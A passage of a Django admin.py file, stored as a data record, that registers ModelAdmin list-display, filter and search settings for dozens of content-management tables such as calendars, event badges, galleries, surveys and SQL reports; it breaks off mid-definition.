+{"seq_id":"46070817903","text":"# vim: set fileencoding=utf-8 :\r\nimport models\r\nfrom django.contrib import admin\r\n\r\n\r\nclass AdSkuAdmin(admin.ModelAdmin):\r\n\r\n    list_display = (\r\n        u'id',\r\n        'asset_id',\r\n        'revision_date',\r\n        'purchase_template',\r\n        'manage_template',\r\n        'ad_space',\r\n        'priority',\r\n        'price_per_click',\r\n        'price_per_impression',\r\n        'click_discounts',\r\n        'impression_discounts',\r\n        'karma',\r\n    )\r\n\r\n\r\nclass ArticleAdmin(admin.ModelAdmin):\r\n\r\n    list_display = (\r\n        u'id',\r\n        'link_title',\r\n        'link_url',\r\n        'asset_id',\r\n        'template_id',\r\n        'revision_date',\r\n        'cache_timeout',\r\n        'storage_id',\r\n    )\r\n\r\n\r\nclass CalendarAdmin(admin.ModelAdmin):\r\n\r\n    list_display = (\r\n        u'id',\r\n        'asset_id',\r\n        'revision_date',\r\n        'default_date',\r\n        'default_view',\r\n        'visitor_cache_timeout',\r\n        'template_id_month',\r\n        'template_id_week',\r\n        'template_id_day',\r\n        'template_id_event',\r\n        'template_id_event_edit',\r\n        'template_id_search',\r\n        'template_id_print_month',\r\n        'template_id_print_week',\r\n        'template_id_print_day',\r\n        'template_id_print_event',\r\n        'group_id_event_edit',\r\n        'group_id_subscribed',\r\n        'subscriber_notify_offset',\r\n        'sort_events_by',\r\n        'list_view_page_interval',\r\n        'template_id_list',\r\n        'template_id_print_list',\r\n        'ical_interval',\r\n        'workflow_id_commit',\r\n        'ical_feeds',\r\n    )\r\n\r\n\r\nclass CarouselAdmin(admin.ModelAdmin):\r\n\r\n    list_display = (\r\n        u'id',\r\n        'asset_id',\r\n        'revision_date',\r\n        'items',\r\n        'template_id',\r\n        'slide_width',\r\n    )\r\n\r\n\r\nclass DataFormAdmin(admin.ModelAdmin):\r\n\r\n    list_display = (\r\n        u'id',\r\n        'acknowledgement',\r\n        'mail_data',\r\n        'email_template_id',\r\n        'acknowlegement_template_id',\r\n        'list_template_id',\r\n        'asset_id',\r\n        'template_id',\r\n        'default_view',\r\n        'revision_date',\r\n        'group_to_view_entries',\r\n        'mail_attachments',\r\n        'use_captcha',\r\n        'store_data',\r\n        'field_configuration',\r\n        'tab_configuration',\r\n        'workflow_id_add_entry',\r\n        
'html_area_rich_editor',\n )\n\n\nclass DataFormEntryAdmin(admin.ModelAdmin):\n\n list_display = (\n 'data_form_entry_id',\n 'user',\n 'username',\n 'ip_address',\n 'asset_id',\n 'entry_data',\n 'submission_date',\n )\n list_filter = ('user', 'submission_date')\n\n\nclass DataTableAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'data',\n 'template_id',\n )\n\n\nclass EMSBadgeAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'price',\n 'seats_available',\n 'related_badge_groups',\n 'template_id',\n 'early_bird_price',\n 'early_bird_price_end_date',\n 'pre_registration_price',\n 'pre_registration_price_end_date',\n )\n\n\nclass EMSBadgeGroupAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'badge_group', 'ems_asset_id', 'name')\n list_filter = ('badge_group',)\n search_fields = ('name',)\n\n\nclass EMSEventMetaFieldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'field_id',\n 'asset_id',\n 'label',\n 'data_type',\n 'visible',\n 'required',\n 'possible_values',\n 'default_values',\n 'sequence_number',\n )\n\n\nclass EMSRegistrantAdmin(admin.ModelAdmin):\n\n list_display = (\n 'badge_id',\n 'user',\n 'badge_number',\n 'badge_asset_id',\n 'ems_asset_id',\n 'name',\n 'address1',\n 'address2',\n 'address3',\n 'city',\n 'state',\n 'zipcode',\n 'country',\n 'phone_number',\n 'organization',\n 'email',\n 'notes',\n 'purchase_complete',\n 'has_checked_in',\n 'transaction_item_id',\n )\n list_filter = ('user',)\n search_fields = ('name',)\n\n\nclass EMSRegistrantRibbonAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'badge_id',\n 'ribbon_asset_id',\n 'transaction_item_id',\n )\n\n\nclass EMSRegistrantTicketAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'badge_id',\n 'ticket_asset_id',\n 'purchase_complete',\n 'transaction_item_id',\n )\n\n\nclass EMSRegistrantTokenAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'badge_id',\n 'token_asset_id',\n 'quantity',\n 'transaction_item_ids',\n )\n\n\nclass EMSRibbonAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'percentage_discount',\n 'price',\n )\n\n\nclass EMSTicketAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'price',\n 'seats_available',\n 'start_date',\n 'duration',\n 'event_number',\n 'location',\n 'related_badge_groups',\n 'related_ribbons',\n 'event_meta_data',\n )\n list_filter = ('start_date',)\n\n\nclass EMSTokenAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'revision_date', 'price')\n\n\nclass EventAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'feed_id',\n 'feed_uid',\n 'start_date',\n 'end_date',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'recur_id',\n 'description',\n 'start_time',\n 'end_time',\n 'related_links',\n 'location',\n 'storage_id',\n 'time_zone',\n 'i_cal_sequence_number',\n 'sequence_number',\n )\n list_filter = ('start_date', 'end_date')\n\n\nclass EventManagementSystemAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_to_approve_events',\n 'timezone',\n 'template_id',\n 'badge_builder_template_id',\n 'lookup_registrant_template_id',\n 'print_badge_template_id',\n 'print_ticket_template_id',\n 'badge_instructions',\n 'ribbon_instructions',\n 'ticket_instructions',\n 'token_instructions',\n 'registration_staff_group',\n 'schedule_template_id',\n 'schedule_columns_per_page',\n )\n 
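    # list_display controls the columns shown on this model's admin changelist
    # page; list_filter (next line) adds a right-hand sidebar for filtering the
    # rows by the named fields. Both are stock django.contrib.admin.ModelAdmin
    # options.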
list_filter = ('registration_staff_group',)\n\n\nclass EventRecurAdmin(admin.ModelAdmin):\n\n list_display = (\n 'recur_id',\n 'recur_type',\n 'pattern',\n 'start_date',\n 'end_date',\n )\n list_filter = ('start_date',)\n\n\nclass EventRelatedlinkAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'eventlink_id',\n 'asset_id',\n 'link_url',\n 'linktext',\n 'group_id_view',\n 'sequence_number',\n )\n\n\nclass FileAssetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'storage_id',\n 'filename',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n )\n\n\nclass FlatDiscountAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'must_spend',\n 'percentage_discount',\n 'price_discount',\n 'thank_you_message',\n )\n\n\nclass FolderAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'visitor_cache_timeout',\n 'sort_alphabetically',\n 'sort_order',\n )\n\n\nclass GalleryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_id_add_comment',\n 'group_id_add_file',\n 'image_resolutions',\n 'image_view_size',\n 'image_thumbnail_size',\n 'max_space_per_user',\n 'rich_edit_id_comment',\n 'template_id_add_archive',\n 'template_id_delete_album',\n 'template_id_delete_file',\n 'template_id_edit_album',\n 'template_id_edit_file',\n 'template_id_list_albums',\n 'template_id_list_albums_rss',\n 'template_id_list_files_for_user',\n 'template_id_list_files_for_user_rss',\n 'template_id_make_shortcut',\n 'template_id_search',\n 'template_id_view_slideshow',\n 'template_id_view_thumbnails',\n 'template_id_view_album',\n 'template_id_view_album_rss',\n 'template_id_view_file',\n 'view_album_asset_id',\n 'view_default',\n 'view_list_order_by',\n 'view_list_order_direction',\n 'workflow_id_commit',\n 'template_id_edit_comment',\n 'rich_edit_id_album',\n 'rich_edit_id_file',\n 'default_files_per_page',\n 'image_density',\n )\n\n\nclass GalleryAlbumAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'allow_comments',\n 'asset_id_thumbnail',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'others_can_add',\n )\n\n\nclass GalleryFileAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'views',\n 'friends_only',\n 'rating',\n )\n\n\nclass GalleryFileCommentAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'comment_id',\n 'user',\n 'visitor_ip',\n 'creation_date',\n 'body_text',\n )\n list_filter = ('user', 'creation_date')\n\n\nclass HttpProxyAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'proxied_url',\n 'timeout',\n 'remove_style',\n 'filter_html',\n 'follow_external',\n 'follow_redirect',\n 'cache_http',\n 'use_cache',\n 'debug',\n 'rewrite_urls',\n 'search_for',\n 'stop_at',\n 'cookie_jar_storage_id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'use_ampersand',\n 'url_pattern_filter',\n )\n\n\nclass ImageAssetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'thumbnail_size',\n 'parameters',\n 'revision_date',\n 'annotations',\n )\n\n\nclass KBAuthAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'username', 'password')\n\n\nclass LayoutAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'content_positions',\n 
'assets_to_hide',\n 'revision_date',\n 'asset_order',\n 'mobile_template_id',\n )\n\n\nclass MacroAttendEventAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'guid', 'user')\n list_filter = ('user',)\n\n\nclass MailingAdmin(admin.ModelAdmin):\n\n list_display = (\n 'mailing_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'issue_id',\n 'asset_id',\n 'send_date',\n 'configuration',\n 'state',\n )\n list_filter = ('date_created', 'last_updated')\n\n\nclass MailingEmailAdmin(admin.ModelAdmin):\n\n list_display = (\n 'mail_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'bounce_reason',\n 'status',\n 'user',\n 'mailing_id',\n 'error_message',\n 'sent_to',\n 'is_test',\n 'send_date',\n 'recipient_email',\n )\n list_filter = ('date_created', 'last_updated', 'user')\n\n\nclass MailmanManagerAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'revision_date')\n\n\nclass MailmanManagerGroupsInListAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'list_id', 'group')\n list_filter = ('group',)\n\n\nclass MailmanManagerListAdmin(admin.ModelAdmin):\n\n list_display = (\n 'list_id',\n 'is_alias',\n 'list_name',\n 'list_title',\n 'list_address',\n 'extra_addresses',\n 'config_overrides',\n 'exclude_group',\n )\n\n\nclass MailmanManagerSubscribeConfirmationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'list_id',\n 'confirmation_code',\n 'email',\n 'date_added',\n )\n list_filter = ('date_added',)\n\n\nclass MapAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_id_add_point',\n 'map_api_key',\n 'map_height',\n 'map_width',\n 'start_latitude',\n 'start_longitude',\n 'start_zoom',\n 'template_id_edit_point',\n 'template_id_view',\n 'template_id_view_point',\n 'workflow_id_point',\n )\n\n\nclass MapPointAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'latitude',\n 'longitude',\n 'website',\n 'address1',\n 'address2',\n 'city',\n 'state',\n 'zip_code',\n 'country',\n 'phone',\n 'fax',\n 'email',\n 'storage_id_photo',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n )\n\n\nclass MatrixAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'detail_template_id',\n 'compare_template_id',\n 'search_template_id',\n 'categories',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'max_comparisons',\n 'max_comparisons_privileged',\n 'group_to_add',\n 'default_sort',\n 'compare_color_no',\n 'compare_color_limited',\n 'compare_color_costs_extra',\n 'compare_color_free_add_on',\n 'compare_color_yes',\n 'submission_approval_workflow_id',\n 'ratings_duration',\n 'edit_listing_template_id',\n 'screenshots_config_template_id',\n 'screenshots_template_id',\n 'statistics_cache_timeout',\n 'max_comparisons_group',\n 'max_comparisons_group_int',\n 'max_screenshot_width',\n 'max_screenshot_height',\n 'listings_cache_timeout',\n )\n\n\nclass MatrixListingAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'screenshots',\n 'description',\n 'version',\n 'views',\n 'compares',\n 'clicks',\n 'views_last_ip',\n 'compares_last_ip',\n 'clicks_last_ip',\n 'last_updated',\n 'maintainer',\n 'manufacturer_name',\n 'manufacturer_url',\n 'product_url',\n 'score',\n )\n\n\nclass MatrixListingAttributeAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'matrix_id',\n 'matrix_listing_id',\n 'attribute_id',\n 'value',\n )\n\n\nclass MatrixListingRatingAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 
'time_stamp',\n 'category',\n 'rating',\n 'listing_id',\n 'ip_address',\n 'asset_id',\n 'user',\n )\n list_filter = ('user',)\n\n\nclass MatrixListingRatingSummaryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'listing_id',\n 'category',\n 'mean_value',\n 'median_value',\n 'count_value',\n 'asset_id',\n )\n\n\nclass MatrixAttributeAdmin(admin.ModelAdmin):\n\n list_display = (\n 'attribute_id',\n 'category',\n 'name',\n 'description',\n 'field_type',\n 'default_value',\n 'asset_id',\n 'options',\n )\n search_fields = ('name',)\n\n\nclass MessageBoardAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'visitor_cache_timeout',\n )\n\n\nclass MultiSearchAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'predefined_searches',\n 'cache_timeout',\n )\n\n\nclass NavigationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'assets_to_include',\n 'start_type',\n 'start_point',\n 'descendant_end_point',\n 'show_system_pages',\n 'show_hidden_pages',\n 'show_unprivileged_pages',\n 'template_id',\n 'ancestor_end_point',\n 'revision_date',\n 'mime_type',\n 'reverse_page_loop',\n )\n\n\nclass NewsletterAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'newsletter_template_id',\n 'my_subscriptions_template_id',\n 'newsletter_header',\n 'newsletter_footer',\n 'newsletter_categories',\n )\n\n\nclass NewsletterCollectionAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'view_template_id',\n 'recent_issue_count',\n )\n\n\nclass NewsletterSubscriptionAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user',\n 'subscriptions',\n 'last_time_sent',\n )\n list_filter = ('user',)\n\n\nclass PMProjectAdmin(admin.ModelAdmin):\n\n list_display = (\n 'project_id',\n 'asset_id',\n 'name',\n 'description',\n 'start_date',\n 'end_date',\n 'project_manager',\n 'duration_units',\n 'hours_per_day',\n 'target_budget',\n 'percent_complete',\n 'parent_id',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n 'project_observer',\n )\n search_fields = ('name',)\n\n\nclass PMTaskAdmin(admin.ModelAdmin):\n\n list_display = (\n 'task_id',\n 'project_id',\n 'task_name',\n 'duration',\n 'start_date',\n 'end_date',\n 'dependants',\n 'parent_id',\n 'percent_complete',\n 'sequence_number',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n 'lag_time',\n 'task_type',\n )\n\n\nclass PMTaskResourceAdmin(admin.ModelAdmin):\n\n list_display = (\n 'task_resource_id',\n 'task_id',\n 'sequence_number',\n 'resource_kind',\n 'resource_id',\n )\n\n\nclass PMWobjectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'project_dashboard_template_id',\n 'project_display_template_id',\n 'gantt_chart_template_id',\n 'edit_task_template_id',\n 'group_to_add',\n 'revision_date',\n 'resource_popup_template_id',\n 'resource_list_template_id',\n )\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'exif_data',\n 'location',\n )\n\n\nclass PhotoRatingAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'user', 'visitor_ip', 'rating')\n list_filter = ('user',)\n\n\nclass PollAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'active',\n 'graph_width',\n 'vote_group',\n 'question',\n 'a1',\n 'a2',\n 'a3',\n 'a4',\n 'a5',\n 'a6',\n 'a7',\n 'a8',\n 'a9',\n 'a10',\n 'a11',\n 'a12',\n 
'a13',\n 'a14',\n 'a15',\n 'a16',\n 'a17',\n 'a18',\n 'a19',\n 'a20',\n 'karma_per_vote',\n 'randomize_answers',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'graph_configuration',\n 'generate_graph',\n )\n\n\nclass PollAnswerAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'answer', 'user', 'ip_address', 'asset_id')\n list_filter = ('user',)\n\n\nclass PostAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'thread_id',\n 'username',\n 'content',\n 'views',\n 'content_type',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'storage_id',\n 'rating',\n 'revision_date',\n 'original_email',\n )\n\n\nclass PostRatingAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user',\n 'ip_address',\n 'date_of_rating',\n 'rating',\n )\n list_filter = ('user',)\n\n\nclass ProductAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'image1',\n 'image2',\n 'image3',\n 'brochure',\n 'manual',\n 'warranty',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'thank_you_message',\n 'accessory_json',\n 'benefit_json',\n 'feature_json',\n 'related_json',\n 'specification_json',\n 'variants_json',\n 'is_shipping_required',\n )\n\n\nclass RichEditAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'ask_about_rich_edit',\n 'preformatted',\n 'editor_width',\n 'editor_height',\n 'source_editor_width',\n 'source_editor_height',\n 'use_br',\n 'nowrap',\n 'remove_line_breaks',\n 'npwrap',\n 'directionality',\n 'toolbar_location',\n 'css_file',\n 'valid_elements',\n 'toolbar_row1',\n 'toolbar_row2',\n 'toolbar_row3',\n 'enable_context_menu',\n 'revision_date',\n 'disable_rich_editor',\n 'inline_popups',\n 'allow_media',\n )\n\n\nclass SQLReportAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'db_query1',\n 'paginate_after',\n 'preprocess_macros1',\n 'debug_mode',\n 'database_link_id1',\n 'placeholder_params1',\n 'preprocess_macros2',\n 'db_query2',\n 'placeholder_params2',\n 'database_link_id2',\n 'preprocess_macros3',\n 'db_query3',\n 'placeholder_params3',\n 'database_link_id3',\n 'preprocess_macros4',\n 'db_query4',\n 'placeholder_params4',\n 'database_link_id4',\n 'preprocess_macros5',\n 'db_query5',\n 'placeholder_params5',\n 'database_link_id5',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'prequery_statements1',\n 'prequery_statements2',\n 'prequery_statements3',\n 'prequery_statements4',\n 'prequery_statements5',\n 'download_type',\n 'download_filename',\n 'download_template_id',\n 'download_mime_type',\n 'download_user_group',\n )\n\n\nclass ShelfAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'revision_date', 'template_id')\n\n\nclass ShortcutAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'override_title',\n 'override_description',\n 'override_template',\n 'override_display_title',\n 'override_template_id',\n 'shortcut_by_criteria',\n 'resolve_multiples',\n 'shortcut_criteria',\n 'asset_id',\n 'template_id',\n 'shortcut_to_asset_id',\n 'disable_content_lock',\n 'revision_date',\n 'pref_fields_to_show',\n 'pref_fields_to_import',\n 'show_reload_icon',\n )\n\n\nclass ShortcutOverrideAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'field_name', 'new_value')\n\n\nclass StockDataAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'display_template_id',\n 'default_stocks',\n 'source',\n 'failover',\n 'revision_date',\n )\n\n\nclass StoryAdmin(admin.ModelAdmin):\n\n 
list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'headline',\n 'subtitle',\n 'byline',\n 'location',\n 'highlights',\n 'story',\n 'photo',\n )\n\n\nclass StoryArchiveAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'stories_per_page',\n 'group_to_post',\n 'template_id',\n 'story_template_id',\n 'edit_story_template_id',\n 'keyword_list_template_id',\n 'archive_after',\n 'rich_editor_id',\n 'approval_workflow_id',\n 'photo_width',\n )\n\n\nclass StoryTopicAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'stories_per',\n 'stories_short',\n 'template_id',\n 'story_template_id',\n )\n\n\nclass SubscriptionAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'thank_you_message',\n 'price',\n 'subscription_group',\n 'duration',\n 'execute_on_subscription',\n 'karma',\n 'redeem_subscription_code_template_id',\n 'recurring_subscription',\n )\n\n\nclass SubscriptionCodeAdmin(admin.ModelAdmin):\n\n list_display = ('code', 'batch_id', 'status', 'date_used', 'used_by')\n\n\nclass SubscriptionCodeBatchAdmin(admin.ModelAdmin):\n\n list_display = (\n 'batch_id',\n 'name',\n 'description',\n 'subscription_id',\n 'expiration_date',\n 'date_created',\n )\n search_fields = ('name',)\n\n\nclass SurveyAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'group_to_take_survey',\n 'group_to_edit_survey',\n 'group_to_view_reports',\n 'overview_template_id',\n 'max_responses_per_user',\n 'gradebook_template_id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'survey_edit_template_id',\n 'answer_edit_template_id',\n 'question_edit_template_id',\n 'section_edit_template_id',\n 'survey_take_template_id',\n 'survey_questions_id',\n 'exit_url',\n 'survey_json',\n 'time_limit',\n 'show_progress',\n 'show_time_limit',\n 'do_after_time_limit',\n 'on_survey_end_workflow_id',\n 'quiz_mode_summary',\n 'survey_summary_template_id',\n 'allow_back_btn',\n 'feedback_template_id',\n 'test_results_template_id',\n )\n\n\nclass SurveyAnswerOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_question_id',\n 'survey_answer_id',\n 'sequence_number',\n 'goto_question',\n 'answer',\n 'is_correct',\n )\n\n\nclass SurveyOldAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'question_order',\n 'group_to_take_survey',\n 'group_to_view_reports',\n 'mode',\n 'survey_id',\n 'anonymous',\n 'questions_per_page',\n 'response_template_id',\n 'overview_template_id',\n 'max_responses_per_user',\n 'questions_per_response',\n 'gradebook_template_id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'default_section_id',\n )\n\n\nclass SurveyQuestionResponseOldAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'survey_id',\n 'survey_question_id',\n 'survey_answer_id',\n 'survey_response_id',\n 'response',\n 'comment',\n 'date_of_response',\n )\n\n\nclass SurveyQuestionTypeAdmin(admin.ModelAdmin):\n\n list_display = ('question_type', 'answers')\n\n\nclass SurveyQuestionOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_question_id',\n 'question',\n 'sequence_number',\n 'allow_comment',\n 'randomize_answers',\n 'answer_field_type',\n 'goto_question',\n 'survey_section_id',\n )\n\n\nclass SurveyResponseAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'survey_response_id',\n 'user',\n 'username',\n 'ip_address',\n 'start_date',\n 'end_date',\n 'is_complete',\n 'anon_id',\n 'response_json',\n 'revision_date',\n )\n list_filter = 
('user',)\n\n\nclass SurveyResponseOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_response_id',\n 'user',\n 'username',\n 'ip_address',\n 'start_date',\n 'end_date',\n 'is_complete',\n )\n list_filter = ('user',)\n\n\nclass SurveySectionOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_section_id',\n 'section_name',\n 'sequence_number',\n )\n\n\nclass SurveyTempReportAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'survey_response_id',\n 'order',\n 'section_number',\n 'section_name',\n 'question_number',\n 'question_name',\n 'question_comment',\n 'answer_number',\n 'answer_value',\n 'answer_comment',\n 'entry_date',\n 'is_correct',\n 'value',\n 'file_storeage_id',\n )\n\n\nclass SurveyTestAdmin(admin.ModelAdmin):\n\n list_display = (\n 'test_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'asset_id',\n 'name',\n 'test',\n )\n list_filter = ('date_created', 'last_updated')\n search_fields = ('name',)\n\n\nclass SyndicatedContentAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'rss_url',\n 'max_headlines',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'has_terms',\n 'cache_timeout',\n 'process_macro_in_rss_url',\n )\n\n\nclass TTProjectListAdmin(admin.ModelAdmin):\n\n list_display = (\n 'project_id',\n 'asset_id',\n 'project_name',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n )\n\n\nclass TTProjectResourceListAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'project_id', 'resource_id')\n\n\nclass TTProjectTaskAdmin(admin.ModelAdmin):\n\n list_display = ('task_id', 'project_id', 'task_name')\n\n\nclass TTReportAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'report_id',\n 'asset_id',\n 'start_date',\n 'end_date',\n 'report_complete',\n 'resource_id',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n )\n\n\nclass TTTimeEntryAdmin(admin.ModelAdmin):\n\n list_display = (\n 'entry_id',\n 'project_id',\n 'task_id',\n 'task_date',\n 'hours',\n 'comments',\n 'report_id',\n )\n\n\nclass TTWobjectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user_view_template_id',\n 'manager_view_template_id',\n 'time_row_template_id',\n 'pm_asset_id',\n 'group_to_manage',\n 'revision_date',\n 'pm_integration',\n )\n\n\nclass ThingyAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'default_thing_id',\n )\n\n\nclass ThingyRecordAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id_view',\n 'thing_id',\n 'thing_fields',\n 'thank_you_text',\n 'price',\n 'duration',\n 'field_price',\n )\n\n\nclass ThingyRecordRecordAdmin(admin.ModelAdmin):\n\n list_display = (\n 'record_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'transaction_id',\n 'asset_id',\n 'expires',\n 'user',\n 'fields',\n 'is_hidden',\n 'sent_expires_notice',\n )\n list_filter = ('date_created', 'last_updated', 'user')\n\n\nclass ThingyFieldAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'thing_id',\n 'field_id',\n 'sequence_number',\n 'date_created',\n 'created_by',\n 'date_updated',\n 'updated_by',\n 'label',\n 'field_type',\n 'default_value',\n 'possible_values',\n 'subtext',\n 'status',\n 'width',\n 'height',\n 'vertical',\n 'extras',\n 'display',\n 'view_screen_title',\n 'display_in_search',\n 'search_in',\n 'field_in_other_thing_id',\n 'size',\n 'pretext',\n )\n\n\nclass 
